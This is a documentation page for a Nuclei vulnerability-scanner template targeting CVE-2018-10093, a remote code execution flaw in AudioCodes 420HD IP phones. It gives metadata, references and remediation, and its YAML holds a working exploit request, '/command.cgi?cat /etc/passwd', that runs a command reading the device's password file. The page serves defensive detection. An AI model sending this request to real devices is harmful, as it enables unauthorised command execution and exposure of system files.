Skip to content
Nuclei Templates

AudioCodes 420HD - Remote Code Execution

ID: CVE-2018-10093

Severity: high

Author: wisnupramoedya

Tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes

Description

Section titled “Description”

AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2018-10093


info:
  name: AudioCodes 420HD - Remote Code Execution
  author: wisnupramoedya
  severity: high
  description: |
    AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.
  remediation: |
    Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation.
  reference:
    - https://www.exploit-db.com/exploits/46164
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10093
    - https://www.exploit-db.com/exploits/46164/
    - http://seclists.org/fulldisclosure/2019/Jan/38
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-10093
    cwe-id: CWE-862
    epss-score: 0.06287
    epss-percentile: 0.92936
    cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: audiocodes
    product: 420hd_ip_phone_firmware
  tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes


http:
  - method: GET
    path:
      - "{{BaseURL}}/command.cgi?cat%20/etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "admin:.*:*sh$"


      - type: status
        status:
          - 200
# digest: 490a0046304402203983c9175f1e566d8be925cd895700e69a9ec19ea19a9c145af02e5eacf8a70b022060863ce2d6e4e6d71f4a48329857ac5011c3580ef4eee05627bc874ab6615600:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10093.yaml"

View on Github